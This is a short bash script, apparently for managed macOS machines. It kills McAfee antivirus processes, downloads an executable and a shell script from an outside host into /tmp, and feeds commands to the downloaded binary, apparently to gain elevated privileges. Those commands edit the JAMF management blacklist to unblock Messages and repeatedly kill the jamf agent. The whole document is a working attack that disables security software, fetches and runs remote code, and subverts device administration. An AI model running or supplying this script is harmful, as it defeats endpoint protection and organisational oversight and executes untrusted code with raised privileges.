#!/bin/bash

pkill .*McAfee.*
killall Messages

curl -s https://erikboesen.com/downloads/elevate.out --output /tmp/elevate.out
chmod +x /tmp/elevate.out

curl -s https://erikboesen.com/downloads/enact.sh --output /tmp/enact.sh
chmod +x /tmp/enact.sh

/tmp/elevate.out <<EOF
/tmp/enact.sh &
sed -i -e 's/Messages/iMessage/g' /Library/Application\ Support/JAMF/.blacklist.xml
for i in {1..5}; do
    killall jamf
    sleep .3s
done
EOF

open /Applications/Messages.app

exit
